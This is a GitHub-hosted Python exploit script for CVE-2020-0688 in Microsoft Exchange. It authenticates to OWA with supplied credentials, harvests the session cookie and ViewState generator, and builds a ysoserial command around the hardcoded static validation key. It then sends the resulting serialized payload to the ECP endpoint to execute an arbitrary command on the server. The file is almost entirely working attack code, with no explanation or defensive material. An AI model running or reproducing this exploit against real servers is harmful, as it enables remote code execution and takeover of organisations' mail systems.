-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathCVE-2020-0688.py
62 lines (52 loc) · 2.84 KB
/
CVE-2020-0688.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#coding:utf-8
#author:Jumbo
import readline
import requests
import re
import sys
import urllib3
urllib3.disable_warnings()
from urllib.parse import quote
def Exp(url,ASP_NET_SessionId,generator_result,command):
validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'
VIEWSTATECOMMAND = 'ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{validationkey}" --generator="{generator_result}" --viewstateuserkey="{ASP_NET_SessionId}" --isdebug –islegacy'.format(command=command,validationkey=validationkey, generator_result=generator_result,ASP_NET_SessionId=ASP_NET_SessionId)
print('please execute \n{VIEWSTATECOMMAND}'.format(VIEWSTATECOMMAND=VIEWSTATECOMMAND))
fuckkk = input('please write your ysoserial generate payload: ')
fuckkk = quote(fuckkk, 'utf-8')
expurl = 'https://{url}/ecp/default.aspx?__VIEWSTATEGENERATOR={generator_result}&__VIEWSTATE={fuckkk}'.format(url=url,generator_result=generator_result,fuckkk=fuckkk)
print(expurl)
expgo = s.get(expurl,verify=False)
print(expgo.status_code)
print('gogogoggogoggogogogogogogogogogog')
def GetSomething():
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
command = sys.argv[4]
destination = 'https://' + url + '/ecp/default.aspx'
authurl = 'https://' + url + '/owa/auth.owa'
logindata = 'destination={destination}&flags=4&forcedownlevel=0&username={username}&password={password}&passwordText=&isUtf8=1'.format(destination=destination,username=username, password=password)
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded","Cookie":"PrivateComputer=true; PBack=0"}
login = s.post(authurl, data=logindata,headers=headers,verify=False)
logincontent = login.content
# print(logincontent)
ASP_NET_SessionId = login.cookies['ASP.NET_SessionId']
if ASP_NET_SessionId:
print('got ASP_NET_SessionId Success')
print(ASP_NET_SessionId)
else:
print('got ASP_NET_SessionId Fail')
generator_regex = b'VIEWSTATEGENERATOR" value="(.*?)"'
try:
generator_result = re.findall(generator_regex,logincontent)[0].decode('utf-8')
if generator_result:
print('got generator_result Success')
print(generator_result)
else:
print('got generator_result Fail,try default')
except Exception as e:
generator_result = 'B97B4E27'
print(generator_result)
Exp(url,ASP_NET_SessionId,generator_result,command)
s = requests.Session()
GetSomething()